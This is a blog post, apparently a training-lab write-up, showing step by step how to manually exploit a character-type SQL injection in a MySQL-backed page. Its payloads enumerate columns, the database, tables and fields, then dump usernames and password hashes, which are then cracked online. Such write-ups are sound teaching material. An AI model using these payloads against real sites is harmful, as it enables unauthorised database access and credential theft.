墨者 - SQL手工注入漏洞测试(MySQL数据库-字符型)

本文详细介绍了一种字符型SQL注入的实战方法,通过构造特定的SQL语句,进行数据库信息的探测,包括数据库名、表名、字段名及字段值的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了

id=tingjigonggao' order by 1 -- 测试 字段个数,发现有4个

 试过盲猜表,admin,manger,失败

 老老实实暴库,先测回显位置  id=tingjigongga' union select '1','2','3','4' -- 

 

 

/new_list.php?id=tingjigongga' union select '1',database(),'3','4' --      爆库

 id=tingjigongga' union select '1',(select group_concat(table_name) from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup' limit 0,1),'3','4' --     爆表

 

id=tingjigonggao1' union select '1',(select group_concat(column_name) from information_schema.columns where table_name='stormgroup_member'),'3','4' --      爆字段

id=tingjigonggao1' union select '1',(select group_concat(name,0x7c,password,0x7e) from stormgroup_member),'3','4' --    

爆字段值

MD5在线解密即可 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值